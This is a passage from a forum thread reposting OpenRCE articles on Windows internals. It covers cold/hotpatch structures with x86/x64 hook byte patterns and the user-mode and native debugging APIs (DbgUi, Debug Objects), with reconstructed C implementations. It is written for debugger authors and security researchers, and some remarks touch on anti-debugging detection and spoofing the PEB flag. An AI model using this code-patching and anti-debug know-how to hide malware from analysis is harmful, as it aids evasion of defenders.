(hotpatch) module is loaded and checked for the presence of '.hotp1 ' section, HOTPATCH_HEADER.Signature and Version. If RTL_PATCH_HEADER for the source module already exists, hooks were successfully applied and HOTP_PATCH_APPLY flag is clear, the hooks are removed. Otherwise RTL_PATCH_HEADER is created, the target module whose name is in HOTPATCH_HEADER.TargetNameRva is checked for presence and validated according to ModuleIdMethod using TargetModuleIdValue. If there's a validation mismatch, system checks whether the target module is the coldpatch according to the coldpatch debug info. If it is the coldpatch, PATCHFLAG_COLDPATCH_VALID flag is set in RTL_PATCH_HEADER.PatchFlags. The functions to fix may access the target image, they can call its functions and use its variables (it means pointers and call and jump targets do not have to be in the hotpatch module because they point directly to the target module). Such codes must be fixed using special relocation fixups from HOTPATCH_HEADER.FixupRgnRva with respect to HOTPATCH_HEADER.OrigHotpBaseAddress and HOTPATCH_HEADER.OrigTargetBaseAddress. Then the functions function as they would be called from the original module. Number of the HOTPATCH_FIXUP_ENTRY structures in the HOTPATCH_FIXUP_REGION must be even number. If the hotpatch contains standard base relocations, they usually apply only to a pointers to hotpatch's import table (APIs). Various places of the target module can be validated according to HOTPATCH_VALIDATION structures in HOTPATCH_HEADER.ValidationArrayRva. Validations with option HOTP_Valid_Hook_Target are skipped (those are the places to patch). HOTPATCH_HOOK_DESCRIPTOR structures are prepared according to HOTPATCH_HOOK structures in HOTPATCH_HEADER.HookArrayRva. HOTPATCH_HOOK.HookOptions contain in their first 5 bits the length of the instruction to replace and it must be at least as long as the length of the branch instruction - the rest is, for some hook types, padded with bytes of value 0xCC. Again there's possibility to validate the bytes that will be replaced (HOTP_Valid_Hook_Target has now no effect). If there's a mismatch and the patch place already contains the adequate branch instruction, a list of RTL_PATCH_HEADER structures in TargetModule.LDR_DATA_TABLE_ENTRY.PatchInformation is traversed and bytes at HOTPATCH_HOOK_DESCRIPTOR.CodeOffset are compared with the prepared branch instruction. If there's mismatch and the target module is the coldpatch, the validation succeeds for some hook types, for the other ones is checked whether the branch instruction points into the coldpatch. Upon succesfull validation and hook preparation are the remaining members of RTL_PATCH_HEADER filled in, the sections of the target module are made writable and the hooks are written by calling ExApplyCodePatch with RTL_PATCH_HEADER.CodeInfo and HOTP_PATCH flag set. If the patch application succeeds, RTL_PATCH_HEADER is linked to TargetModule.LDR_DATA_TABLE_ENTRY.PatchInformation list. There's no security issue: Debug and LoadDriver privileges must be enabled for all Cold/HotPatch operations except for user mode hotpatching or when applying CodeInfo directly. CodeInfo cannot be directly applied to kernel when calling ExApplyCodePatch from user mode. CodeInfo is applied "os-atomically" - the preemption is unlikely. Function to fix doesn't have to be compiled (/linked) with /hotpatch (/functionpadmin) option. There's no public tool (special version of C compiler, linker?) for creating the cold/hotpatches. It is possible to write a tool that will add/write to '.hotp1 ' section of image created by normal compiling/linking but there are 2 problems: How to write the new function with instructions pointing to target module and with this conjuncted Fixup handling. Anyway, one doesn't have to use the target module functions/data so there's no need for the hotpatch fixups. Hook Types HOTP_Hook_None HOTP_Hook_VA32 32 bit value/pointer, 4 bytes HOTP_Hook_X86_JMP x86/64 long relative jump, E9 Rel32, <-2GB..2GB-1>, Rel32 constructed according to Hook/HotpRva, >= 5 bytes, padded with 0xCC HOTP_Hook_PCREL32 not yet implemented, for fixing Rel32 of x86/64 call or jump, 4 bytes HOTP_Hook_X86_JMP2B x86/64 short relative jump, EB Rel8 <-128B..127B>, Rel8 is in HotpRva, >= 2 bytes, padded with 0xCC HOTP_Hook_VA64 64 bit value/pointer, 8 bytes HOTP_Hook_IA64_BRL ia64 branch, at HookRva must be a supported template type >= 16 bytes HOTP_Hook_IA64_BR not yet implemented HOTP_Hook_AMD64_IND x86/64 absolute indirect jump, FF 25 [Offset32 / Rip+Rel32] HotpRva (+Rip) must point to a variable that contains a pointer to fixed function, >= 6 bytes, padded with 0xCC HOTP_Hook_AMD64_CNT 16bit value/pointer, 2 bytes Hook combinations are allowed - HOTP_Hook_X86_JMP2B + HOTP_Hook_X86_JMP is typical. When the distance hotpatch-target exceeds 2GB, HOTP_Hook_AMD64_IND must be employed on x86/64. One then needs a place to store the pointer specified in [Offset32 / Rip+Rel32]. For x86 it can be inside the hotpach module but for x64 not. HOTP_Hook_AMD64_IND + HOTP_Hook_VA64 is the solution. /hotpatch option for x64 is not yet implemented but I would suggest: Buffer: //for HOTP_Hook_VA64 8x nop FnStart: 48 8D A4 24 00 00 00 00 lea rsp, [rsp + 0] - 2 bytes more than required or 0F 8x 00 00 00 00 j?? $+6 - as long as required but slower In Colpatch/After Hotpatching it could look like: Buffer: Ptr64FnContinue FnStart: FF 25 F2 FF FF FF jmp qword ptr [buffer] //[Rip-14] CC CC Of course there's possibility to make a triple patch: JMP2B -> IND -> VA64. x86 Patch Examples Function created with /hotpatch, "semi-hotpachable" function, "non-hotpatchable" function. You may notice there's replaced more than one CPU instruction (5x nop with long relative jmp) but the nops are not involved in the function - they serve as buffer. [TABLE] [TR] [TD=class: table_sub_sub_header]Original Function[/TD] [TD=class: table_sub_sub_header]ColdPatch/After HotPatching[/TD] [TD=class: table_sub_sub_header]In Cold/HotPatch[/TD] [/TR] [TR] [TD] 5x 90 5x nop FnStart: 8B FF mov edi, edi 55 push ebp 8B EC mov ebp, esp 56 push esi 57 push edi 8B 35 g_Data mov esi, g_Data 5x 90 5x nop FnStart: 55 push ebp 8B EC mov ebp, esp 56 push esi 57 push edi 8B 35 g_Data mov esi, g_Data FnStart: 55 push ebp 8B EC mov ebp, esp 56 push esi 57 push edi 8B 35 g_Data mov esi, g_Data [/TD] [TD] E9 Rel32 jmp FnContinue FnStart: EB F9 jmp $-5 55 push ebp 8B EC mov ebp, esp 56 push esi 57 push edi 8B 35 g_Data mov esi, g_Data E9 Rel32 jmp FnContinue FnStart: 55 push ebp EB F8 jmp $-6 56 push esi 57 push edi 8B 35 g_Data mov esi, g_Data FnStart: 55 push ebp 8B EC mov ebp, esp 56 push esi 57 push edi E9 Rel32 jmp FnContinue CC int 3 [/TD] [TD] FnStart: FnContinue: 55 push ebp 8B EC mov ebp, esp 56 push esi 57 push edi 8B 35 g_Data mov esi, g_Data ; fixup required FnStart: 55 push ebp FnContinue: 8B EC mov ebp, esp 56 push esi 57 push edi 8B 35 g_Data mov esi, g_Data ; fixup required FnStart: 55 push ebp 8B EC mov ebp, esp 56 push esi 57 push edi FnContinue: 8B 35 g_Data mov esi, g_Data ; fixup required [/TD] [/TR] [/TABLE] References - Inside Update.exe - Windows Server | Deploy, Manage, Troubleshoot - KB packages for Server2003 x86 that contain the cold/hotpatches: 819696, 823182, 888113, 893086, 899588, 901190 Sursa: OpenRCE
  24. Windows User Mode Debugging Internals Author: AlexIonescu Introduction The internal mechanisms of what allows user-mode debugging to work have rarely ever been fully explained. Even worse, these mechanisms have radically changed in Windows XP, when much of the support was re-written, as well as made more subsystem portable by including most of the routines in ntdll, as part of the Native API. This three part series will explain this functionality, starting from the Win32 (kernel32) viewpoint all the way down (or up) to the NT Kernel (ntoskrnl) component responsible for this support, called Dbgk, while taking a stop to the NT System Library (ntdll) and its DbgUi component. The reader is expected to have some basic knowledge of C and general NT Kernel architecture and semantics. Also, this is not an introduction on what debugging is or how to write a debugger. It is meant as a reference for experienced debugger writers, or curious security experts. Win32 Debugging The Win32 subsystem of NT has allowed the debugging of processes ever since the first release, with later releases adding more features and debugging help libraries, related to symbols and other PE information. However, relatively few things have changed to the outside API user, except for the welcome addition of the ability to stop debugging a process, without killing it, which was added in Windows XP. This release of NT also contained several overhauls to the underlying implementation, which will be discussed in detail. However, one important side-effect of these changes was that LPC (and csrss.exe) were not used anymore, which allowed debugging of this binary to happen (previously, debugging this binary was impossible, since it was the one responsible for handling the kernel-to-user notifications). The basic Win32 APIs for dealing with debugging a process were simple: DebugActiveProcess, to attach, WaitForDebugEvent, to wait for debug events to come through, so that your debugging can handle them, and ContinueDebugEvent, to resume thread execution. The release of Windows XP added three more useful APIs: DebugActiveProcessStop, which allows you to stop debugging a process (detach), DebugSetProcessKillOnExit, which allows you to continue running a process even after its' been detached, and DebugBreakProcess, which allows you to perform a remote DebugBreak without having to manually create a remote thread. In Windows XP Service Pack 1, one more API was added, CheckRemoteDebuggerPresent. Much like its IsDebuggerPresent counterpart, this API allows you to check for a connected debugger in another process, without having to read the PEB remotely. Because of NT's architecture, these APIs, on recent versions of Windows (2003 will be used as an example, but the information applies to XP as well) do not much do much work themselves. Instead, they do the typical job of calling out the native functions required, and then process the output so that the Win32 caller can have it in a format that is compatible with Win9x and the original Win32 API definition. Let's look at these very simple implementations: BOOLWINAPI DebugActiveProcess(IN DWORD dwProcessId) { NTSTATUS Status; HANDLE Handle; /* Connect to the debugger */ Status = DbgUiConnectToDbg(); if (!NT_SUCCESS(Status)) { SetLastErrorByStatus(Status); return FALSE; } /* Get the process handle */ Handle = ProcessIdToHandle(dwProcessId); if (!Handle) return FALSE; /* Now debug the process */ Status = DbgUiDebugActiveProcess(Handle); NtClose(Handle); /* Check if debugging worked */ if (!NT_SUCCESS(Status)) { /* Fail */ SetLastErrorByStatus(Status); return FALSE; } /* Success */ return TRUE; } As you can see, the only work that's being done here is to create the initial connection to the user-mode debugging component, which is done through the DbgUi Native API Set, located in ntdll, which we'll see later. Because DbgUi uses handles instead of PIDs, the PID must first be converted with a simple helper function: HANDLEWINAPI ProcessIdToHandle(IN DWORD dwProcessId) { NTSTATUS Status; OBJECT_ATTRIBUTES ObjectAttributes; HANDLE Handle; CLIENT_ID ClientId; /* If we don't have a PID, look it up */ if (dwProcessId == -1) dwProcessId = (DWORD)CsrGetProcessId(); /* Open a handle to the process */ ClientId.UniqueProcess = (HANDLE)dwProcessId; InitializeObjectAttributes(&ObjectAttributes, NULL, 0, NULL, NULL); Status = NtOpenProcess(&Handle, PROCESS_ALL_ACCESS, &ObjectAttributes, &ClientId); if (!NT_SUCCESS(Status)) { /* Fail */ SetLastErrorByStatus(Status); return 0; } /* Return the handle */ return Handle; } If you are not familiar with Native API, it is sufficient to say that this code is the simple equivalent of an OpenProcess on the PID, so that a handle can be obtained. Going back to DebugActiveProcess, the final call which does the work is DbgUiDebugActiveProcess, which is again located in the Native API. After the connection is made, we can close the handle that we had obtained from the PID previously. Other APIs function much in the same way. Let's take a look at two of the newer XP ones: BOOLWINAPI DebugBreakProcess(IN HANDLE Process) { NTSTATUS Status; /* Send the breakin request */ Status = DbgUiIssueRemoteBreakin(Process); if(!NT_SUCCESS(Status)) { /* Failure */ SetLastErrorByStatus(Status); return FALSE; } /* Success */ return TRUE; } BOOL WINAPI DebugSetProcessKillOnExit(IN BOOL KillOnExit) { HANDLE Handle; NTSTATUS Status; ULONG State; /* Get the debug object */ Handle = DbgUiGetThreadDebugObject(); if (!Handle) { /* Fail */ SetLastErrorByStatus(STATUS_INVALID_HANDLE); return FALSE; } /* Now set the kill-on-exit state */ State = KillOnExit; Status = NtSetInformationDebugObject(Handle, DebugObjectKillProcessOnExitInformation, &State, sizeof(State), NULL); if (!NT_SUCCESS(Status)) { /* Fail */ SetLastError(Status); return FALSE; } /* Success */ return TRUE; } The first hopefully requires no explanation, as it's a simple wrapper, but let's take a look at the second. If you're familiar with the Native API, you'll instantly recognize the familiar NtSetInformationXxx type of API, which is used for setting various settings on the different types of NT Objects, such as files, processes, threads, etc. The interesting to note here, which is new to XP, is that debugging itself is also now done with a Debug Object. The specifics of this object will however be discussed later. For now, let's look at the function. The first API, DbgUiGetThreadDebugObject is another call to DbgUi, which will return a handle to the Debug Object associated with our thread (we'll see where this is stored later). Once we have the handle, we call a Native API which directly communicates with Dbgk (and not DbgUi), which will simply change a flag in the kernel's Debug Object structure. This flag, as we'll see, will be read by the kernel when detaching. A similar function to this one is the CheckRemoteDebuggerPresent, which uses the same type of NT semantics to obtain the information about the process: BOOLWINAPI CheckRemoteDebuggerPresent(IN HANDLE hProcess, OUT PBOOL pbDebuggerPresent) { HANDLE DebugPort; NTSTATUS Status; /* Make sure we have an output and process*/ if (!(pbDebuggerPresent) || !(hProcess)) { /* Fail */ SetLastError(ERROR_INVALID_PARAMETER); return FALSE; } /* Check if the process has a debug object/port */ Status = NtQueryInformationProcess(hProcess, ProcessDebugPort, (PVOID)&DebugPort, sizeof(HANDLE), NULL); if (NT_SUCCESS(Status)) { /* Return the current state */ *pbDebuggerPresent = (DebugPort) ? TRUE : FALSE; return TRUE; } /* Otherwise, fail */ SetLastErrorByStatus(Status); return FALSE; } As you can see, another NtQuery/SetInformationXxx API is being used, but this time for the process. Although you probably now that to detect debugging, one can simple check if NtCurrentPeb()->BeingDebugged, there exists another way to do this, and this is by querying the kernel. Since the kernel needs to communicate with user-mode on debugging events, it needs some sort of way of doing this. Before XP, this used to be done through an LPC port, and now, through a Debug Object (which shares the same pointer, however). Since is located in the EPROCESS structure in kernel mode, we do a query, using the DebugPort information class. If EPROCESS->DebugPort is set to something, then this API will return TRUE, which means that the process is being debugged. This trick can also be used for the local process, but it's much faster to simply read the PEB. One can notice that although some applications like to set Peb->BeingDebugged to FALSE to trick anti-debugging programs, there is no way to set DebugPort to NULL, since the Kernel itself would not let you debug (and you also don't have access to kernel structures). With that in mind, let's see how the gist of the entire Win32 debugging infrastructure, WaitForDebugEvent, is implemented. This needs to be shown before the much-simpler ContinueDebugEvent/DebugActiveProcessStop, because it introduces Win32's high-level internal structure that it uses to wrap around DbgUi. BOOLWINAPI WaitForDebugEvent(IN LPDEBUG_EVENT lpDebugEvent, IN DWORD dwMilliseconds) { LARGE_INTEGER WaitTime; PLARGE_INTEGER Timeout; DBGUI_WAIT_STATE_CHANGE WaitStateChange; NTSTATUS Status; /* Check if this is an infinite wait */ if (dwMilliseconds == INFINITE) { /* Under NT, this means no timer argument */ Timeout = NULL; } else { /* Otherwise, convert the time to NT Format */ WaitTime.QuadPart = UInt32x32To64(-10000, dwMilliseconds); Timeout = &WaitTime; } /* Loop while we keep getting interrupted */ do { /* Call the native API */ Status = DbgUiWaitStateChange(&WaitStateChange, Timeout); } while ((Status == STATUS_ALERTED) || (Status == STATUS_USER_APC)); /* Check if the wait failed */ if (!(NT_SUCCESS(Status)) || (Status != DBG_UNABLE_TO_PROVIDE_HANDLE)) { /* Set the error code and quit */ SetLastErrorByStatus(Status); return FALSE; } /* Check if we timed out */ if (Status == STATUS_TIMEOUT) { /* Fail with a timeout error */ SetLastError(ERROR_SEM_TIMEOUT); return FALSE; } /* Convert the structure */ Status = DbgUiConvertStateChangeStructure(&WaitStateChange, lpDebugEvent); if (!NT_SUCCESS(Status)) { /* Set the error code and quit */ SetLastErrorByStatus(Status); return FALSE; } /* Check what kind of event this was */ switch (lpDebugEvent->dwDebugEventCode) { /* New thread was created */ case CREATE_THREAD_DEBUG_EVENT: /* Setup the thread data */ SaveThreadHandle(lpDebugEvent->dwProcessId, lpDebugEvent->dwThreadId, lpDebugEvent->u.CreateThread.hThread); break; /* New process was created */ case CREATE_PROCESS_DEBUG_EVENT: /* Setup the process data */ SaveProcessHandle(lpDebugEvent->dwProcessId, lpDebugEvent->u.CreateProcessInfo.hProcess); /* Setup the thread data */ SaveThreadHandle(lpDebugEvent->dwProcessId, lpDebugEvent->dwThreadId, lpDebugEvent->u.CreateThread.hThread); break; /* Process was exited */ case EXIT_PROCESS_DEBUG_EVENT: /* Mark the thread data as such */ MarkProcessHandle(lpDebugEvent->dwProcessId); break; /* Thread was exited */ case EXIT_THREAD_DEBUG_EVENT: /* Mark the thread data */ MarkThreadHandle(lpDebugEvent->dwThreadId); break; /* Nothing to do for anything else */ default: break; } /* Return success */ return TRUE; } First, let's look at the DbgUi APIs present. The first, DbgUiWaitStateChange is the Native version of WaitForDebugEvent, and it's responsible for doing the actual wait on the Debug Object, and getting the structure associated with this event. However, DbgUi uses its own internal structures (which we'll show later) so that the Kernel can understand it, while Win32 has had much different structures defined in the Win9x ways. Therefore, one needs to convert this to the Win32 representation, and the DbgUiConvertStateChange API is what does this conversion, returning the LPDEBUG_EVENT Win32 structure that is backwards-compatible and documented on MSDN. What follows after is a switch which is interested in the creation or deletion of a new process or thread. Four APIs are used: SaveProcessHandle and SaveThreadHandle, which save these respective handles (remember that a new process must have an associated thread, so the thread handle is saved as well), and MarkProcessHandle and MarkThreadHandle, which flag these handles as being exited. Let's look as this high-level framework in detail. VOIDWINAPI SaveProcessHandle(IN DWORD dwProcessId, IN HANDLE hProcess) { PDBGSS_THREAD_DATA ThreadData; /* Allocate a thread structure */ ThreadData = RtlAllocateHeap(RtlGetProcessHeap(), 0, sizeof(DBGSS_THREAD_DATA)); if (!ThreadData) return; /* Fill it out */ ThreadData->ProcessHandle = hProcess; ThreadData->ProcessId = dwProcessId; ThreadData->ThreadId = 0; ThreadData->ThreadHandle = NULL; ThreadData->HandleMarked = FALSE; /* Link it */ ThreadData->Next = DbgSsGetThreadData(); DbgSsSetThreadData(ThreadData); } This function allocates a new structure, DBGSS_THREAD_DATA, and simply fills it out with the Process handle and ID that was sent. Finally, it links it with the current DBGSS_THREAD_DATA structure, and set itself as the new current one (thus creating a circular list of DBGSS_THREAD_DATA structures). Let's take a look as this structure: typedef struct _DBGSS_THREAD_DATA{ struct _DBGSS_THREAD_DATA *Next; HANDLE ThreadHandle; HANDLE ProcessHandle; DWORD ProcessId; DWORD ThreadId; BOOLEAN HandleMarked; } DBGSS_THREAD_DATA, *PDBGSS_THREAD_DATA; This generic structure thus allows storing process/thread handles and IDs, as well as the flag which we've talked about in regards to MarkProcess/ThreadHandle. We've also seen some DbgSsSet/GetThreadData functions, which will show us where this circular array of structures is located. Let's look at their implementations: #define DbgSsSetThreadData(d) \ NtCurrentTeb()->DbgSsReserved[0] = d #define DbgSsGetThreadData() \ ((PDBGSS_THREAD_DATA)NtCurrentTeb()->DbgSsReserved[0]) Easy enough, and now we know what the first element of the mysterious DbgSsReserved array in the TEB is. Although you can probably guess the SaveThreadHandle implementation yourself, let's look at it for completeness's sake: VOIDWINAPI SaveThreadHandle(IN DWORD dwProcessId, IN DWORD dwThreadId, IN HANDLE hThread) { PDBGSS_THREAD_DATA ThreadData; /* Allocate a thread structure */ ThreadData = RtlAllocateHeap(RtlGetProcessHeap(), 0, sizeof(DBGSS_THREAD_DATA)); if (!ThreadData) return; /* Fill it out */ ThreadData->ThreadHandle = hThread; ThreadData->ProcessId = dwProcessId; ThreadData->ThreadId = dwThreadId; ThreadData->ProcessHandle = NULL; ThreadData->HandleMarked = FALSE; /* Link it */ ThreadData->Next = DbgSsGetThreadData(); DbgSsSetThreadData(ThreadData); } As expected, nothing new here. The MarkThread/Process functions as just as straight-forward: VOID WINAPI MarkThreadHandle(IN DWORD dwThreadId) { PDBGSS_THREAD_DATA ThreadData; /* Loop all thread data events */ ThreadData = DbgSsGetThreadData(); while (ThreadData) { /* Check if this one matches */ if (ThreadData->ThreadId == dwThreadId) { /* Mark the structure and break out */ ThreadData->HandleMarked = TRUE; break; } /* Move to the next one */ ThreadData = ThreadData->Next; } } VOID WINAPI MarkProcessHandle(IN DWORD dwProcessId) { PDBGSS_THREAD_DATA ThreadData; /* Loop all thread data events */ ThreadData = DbgSsGetThreadData(); while (ThreadData) { /* Check if this one matches */ if (ThreadData->ProcessId == dwProcessId) { /* Make sure the thread ID is empty */ if (!ThreadData->ThreadId) { /* Mark the structure and break out */ ThreadData->HandleMarked = TRUE; break; } } /* Move to the next one */ ThreadData = ThreadData->Next; } } Notice that the only less-than-trivial implementation detail is that the array needs to be parsed in order to find the matching Process and Thread ID. Now that we've taken a look at these structures, let's see the associated ContinueDebugEvent API, which picks up after a WaitForDebugEvent API in order to resume the thread. BOOLWINAPI ContinueDebugEvent(IN DWORD dwProcessId, IN DWORD dwThreadId, IN DWORD dwContinueStatus) { CLIENT_ID ClientId; NTSTATUS Status; /* Set the Client ID */ ClientId.UniqueProcess = (HANDLE)dwProcessId; ClientId.UniqueThread = (HANDLE)dwThreadId; /* Continue debugging */ Status = DbgUiContinue(&ClientId, dwContinueStatus); if (!NT_SUCCESS(Status)) { /* Fail */ SetLastErrorByStatus(Status); return FALSE; } /* Remove the process/thread handles */ RemoveHandles(dwProcessId, dwThreadId); /* Success */ return TRUE; } Again, we're dealing with a DbgUI API, DbgUiContinue, which is going to do all the work for us. Our only job is to call RemoveHandles, which is part of the high-level structures that wrap DbgUi. This functions is slightly more complex then what we've seen, because we're given PID/TIDs, so we need to do some lookups: VOIDWINAPI RemoveHandles(IN DWORD dwProcessId, IN DWORD dwThreadId) { PDBGSS_THREAD_DATA ThreadData; /* Loop all thread data events */ ThreadData = DbgSsGetThreadData(); while (ThreadData) { /* Check if this one matches */ if (ThreadData->ProcessId == dwProcessId) { /* Make sure the thread ID matches too */ if (ThreadData->ThreadId == dwThreadId) { /* Check if we have a thread handle */ if (ThreadData->ThreadHandle) { /* Close it */ CloseHandle(ThreadData->ThreadHandle); } /* Check if we have a process handle */ if (ThreadData->ProcessHandle) { /* Close it */ CloseHandle(ThreadData->ProcessHandle); } /* Unlink the thread data */ DbgSsSetThreadData(ThreadData->Next); /* Free it*/ RtlFreeHeap(RtlGetProcessHeap(), 0, ThreadData); /* Move to the next structure */ ThreadData = DbgSsGetThreadData(); continue; } } /* Move to the next one */ ThreadData = ThreadData->Next; } } Not much explaining is required. As we parse the circular buffer, we try to locate a structure which matches the PID and TID that we were given. Once it's been located, we check if a handle is associated with the thread and the process. If it is, then we can now close the handle. Therefore, the use of this high-level Win32 mechanism is now apparent: it's how we can associate handles to IDs, and close them when cleaning up or continuing. This is because these handles were not opened by Win32, but behind its back by Dbgk. Once the handles are closed, we unlink this structure by changing the TEB pointer to the next structure in the array, and we then free our own Array. We then resume parsing from the next structure on (because more than one such structure could be associated with this PID/TID). Finally, one last piece of the Win32 puzzle is missing in our analysis, and this is the detach function, which was added in XP. Let's take a look at its trivial implementation: BOOLWINAPI DebugActiveProcessStop(IN DWORD dwProcessId) { NTSTATUS Status; HANDLE Handle; /* Get the process handle */ Handle = ProcessIdToHandle(dwProcessId); if (!Handle) return FALSE; /* Close all the process handles */ CloseAllProcessHandles(dwProcessId); /* Now stop debgging the process */ Status = DbgUiStopDebugging(Handle); NtClose(Handle); /* Check for failure */ if (!NT_SUCCESS(Status)) { /* Fail */ SetLastError(ERROR_ACCESS_DENIED); return FALSE; } /* Success */ return TRUE; } It couldn't really get any simpler. Just like for attaching, we first convert the PID to a handle, and then use a DbgUi call (DbgUiStopDebugging) with this process handle in order to detach ourselves from the process. There's one more call being made here, which is CloseAllProcessHandles. This is part of Win32's high-level debugging on top of DbgUi, which we've seen just earlier. This routine is very similar to RemoveHandles, but it only deals with a Process ID, so the implementation is simpler: VOIDWINAPI CloseAllProcessHandles(IN DWORD dwProcessId) { PDBGSS_THREAD_DATA ThreadData; /* Loop all thread data events */ ThreadData = DbgSsGetThreadData(); while (ThreadData) { /* Check if this one matches */ if (ThreadData->ProcessId == dwProcessId) { /* Check if we have a thread handle */ if (ThreadData->ThreadHandle) { /* Close it */ CloseHandle(ThreadData->ThreadHandle); } /* Check if we have a process handle */ if (ThreadData->ProcessHandle) { /* Close it */ CloseHandle(ThreadData->ProcessHandle); } /* Unlink the thread data */ DbgSsSetThreadData(ThreadData->Next); /* Free it*/ RtlFreeHeap(RtlGetProcessHeap(), 0, ThreadData); /* Move to the next structure */ ThreadData = DbgSsGetThreadData(); continue; } /* Move to the next one */ ThreadData = ThreadData->Next; } } And this completes our analysis of the Win32 APIs! Let's take a look at what we've learnt: The actual debugging functionality is present in a module called Dbgk inside the Kernel. It's accessible through the DbgUi Native API interface, located inside the NT System Library, ntdll. Dbgk implements debugging functionality through an NT Object, called a Debug Object, which also provides an NtSetInformation API in order to modify certain flags. The Debug Object associated to a thread can be retrieved with DbgUiGetThreadObject, but we have not yet shown where this is stored. Checking if a process is being debugged can be done by using NtQueryInformationProcess and using the DebugPort information class. This cannot be cheated without a rootkit. Because Dbgk opens certain handles during Debug Events, Win32 needs a way to associated IDs and handles, and uses a circular array of structures called DBGSS_THREAD_DATA to store this in the TEB's DbgSsReserved[0] member. Sursa: OpenRCE
  25. Windows Native Debugging Internals Author: AlexIonescu Introduction In part two of this three part article series, the native interface to Windows debugging is dissected in detail. The reader is expected to have some basic knowledge of C and general NT Kernel architecture and semantics. Also, this is not an introduction on what debugging is or how to write a debugger. It is meant as a reference for experienced debugger writers, or curious security experts. Native Debugging Now it's time to look at the native side of things, and how the wrapper layer inside ntdll.dll communicates with the kernel. The advantage of having the DbgUi layer is that it allows better separation between Win32 and the NT Kernel, which has always been a part of NT design. NTDLL and NTOSKRNL are built together, so it's normal for them to have intricate knowledge of each others. They share the same structures, they need to have the same system call IDs, etc. In a perfect world, the NT Kernel should have to know nothing about Win32. Additionally, it helps anyone that wants to write debugging capabilities inside a native application, or to write a fully-featured native-mode debugger. Without DbgUi, one would have to call the Nt*DebugObject APIs manually, and do some extensive pre/post processing in some cases. DbgUi simplifies all this work to a simple call, and provides a clean interface to do it. If the kernel changes internally, DbgUi will probably stay the same, only its internal code would be modified. We start our exploration with the function responsible for creating and associating a Debug Object with the current Process. Unlike in the Win32 world, there is a clear distinction between creating a Debug Object, and actually attaching to a process. NTSTATUSNTAPI DbgUiConnectToDbg(VOID) { OBJECT_ATTRIBUTES ObjectAttributes; /* Don't connect twice */ if (NtCurrentTeb()->DbgSsReserved[1]) return STATUS_SUCCESS; /* Setup the Attributes */ InitializeObjectAttributes(&ObjectAttributes, NULL, 0, NULL, 0); /* Create the object */ return ZwCreateDebugObject(&NtCurrentTeb()->DbgSsReserved[1], DEBUG_OBJECT_ALL_ACCESS, &ObjectAttributes, TRUE); } As you can see, this is a trivial implementation, but it shows us two things. Firstly, a thread can only have one debug object associated to it, and secondly, the handle to this object is stored in the TEB's DbgSsReserved array field. Recall that in Win32, the first index, [0], is where the Thread Data was stored. We've now learnt that [1] is where the handle is stored. Now let's see how attaching and detaching are done: NTSTATUSNTAPI DbgUiDebugActiveProcess(IN HANDLE Process) { NTSTATUS Status; /* Tell the kernel to start debugging */ Status = NtDebugActiveProcess(Process, NtCurrentTeb()->DbgSsReserved[1]); if (NT_SUCCESS(Status)) { /* Now break-in the process */ Status = DbgUiIssueRemoteBreakin(Process); if (!NT_SUCCESS(Status)) { /* We couldn't break-in, cancel debugging */ DbgUiStopDebugging(Process); } } /* Return status */ return Status; } NTSTATUS NTAPI DbgUiStopDebugging(IN HANDLE Process) { /* Call the kernel to remove the debug object */ return NtRemoveProcessDebug(Process, NtCurrentTeb()->DbgSsReserved[1]); } Again, these are very simple implementations. We can learn, however, that the kernel is not responsible for actually breaking inside the remote process, but that this is done by the native layer. This DbgUiIssueRemoteBreakin API is also used by Win32 when calling DebugBreakProcess, so let's look at it: NTSTATUSNTAPI DbgUiIssueRemoteBreakin(IN HANDLE Process) { HANDLE hThread; CLIENT_ID ClientId; NTSTATUS Status; /* Create the thread that will do the breakin */ Status = RtlCreateUserThread(Process, NULL, FALSE, 0, 0, PAGE_SIZE, (PVOID)DbgUiRemoteBreakin, NULL, &hThread, &ClientId); /* Close the handle on success */ if(NT_SUCCESS(Status)) NtClose(hThread); /* Return status */ return Status; } All it does is create a remote thread inside the process, and then return to the caller. Does that remote thread do anything magic? Let's see: VOIDNTAPI DbgUiRemoteBreakin(VOID) { /* Make sure a debugger is enabled; if so, breakpoint */ if (NtCurrentPeb()->BeingDebugged) DbgBreakPoint(); /* Exit the thread */ RtlExitUserThread(STATUS_SUCCESS); } Nothing special at all; the thread makes sure that the process is really being debugged, and then issues a breakpoint. And, because this API is exported, you can call it locally from your own process to issue a debug break (but note that you will kill your own thread). In our look at the Win32 Debugging implementation, we've noticed that the actual debug handle is never used, and that calls always go through DbgUi. Then the NtSetInformationDebugObject system call was called, a special DbgUi API was called before, to actually get the debug object associated with the thread. This API also has a counterpart, so let's see both in action: HANDLENTAPI DbgUiGetThreadDebugObject(VOID) { /* Just return the handle from the TEB */ return NtCurrentTeb()->DbgSsReserved[1]; } VOID NTAPI DbgUiSetThreadDebugObject(HANDLE DebugObject) { /* Just set the handle in the TEB */ NtCurrentTeb()->DbgSsReserved[1] = DebugObject; } For those familiar with object-oriented programming, this will seem similar to the concept of accessor and mutator methods. Even though Win32 has perfect access to this handle and could simply read it on its own, the NT developers decided to make DbgUi much like a class, and make sure access to the handle goes through these public methods. This design allows the debug handle to be stored anywhere else if necessary, and only these two APIs will require changes, instead of multiple DLLs in Win32. Now for a visit of the wait/continue functions, which under Win32 were simply wrappers: NTSTATUSNTAPI DbgUiContinue(IN PCLIENT_ID ClientId, IN NTSTATUS ContinueStatus) { /* Tell the kernel object to continue */ return ZwDebugContinue(NtCurrentTeb()->DbgSsReserved[1], ClientId, ContinueStatus); } NTSTATUS NTAPI DbgUiWaitStateChange(OUT PDBGUI_WAIT_STATE_CHANGE DbgUiWaitStateCange, IN PLARGE_INTEGER TimeOut OPTIONAL) { /* Tell the kernel to wait */ return NtWaitForDebugEvent(NtCurrentTeb()->DbgSsReserved[1], TRUE, TimeOut, DbgUiWaitStateCange); } Not surprisingly, these functions are also wrappers in DbgUi. However, this is where things start to get interesting, since if you'll recall, DbgUi uses a completely different structure for debug events, called DBGUI_WAIT_STATE_CHANGE. There is one API that we have left to look at, which does the conversion, so first, let's look at the documentation for this structure: //// User-Mode Debug State Change Structure // typedef struct _DBGUI_WAIT_STATE_CHANGE { DBG_STATE NewState; CLIENT_ID AppClientId; union { struct { HANDLE HandleToThread; DBGKM_CREATE_THREAD NewThread; } CreateThread; struct { HANDLE HandleToProcess; HANDLE HandleToThread; DBGKM_CREATE_PROCESS NewProcess; } CreateProcessInfo; DBGKM_EXIT_THREAD ExitThread; DBGKM_EXIT_PROCESS ExitProcess; DBGKM_EXCEPTION Exception; DBGKM_LOAD_DLL LoadDll; DBGKM_UNLOAD_DLL UnloadDll; } 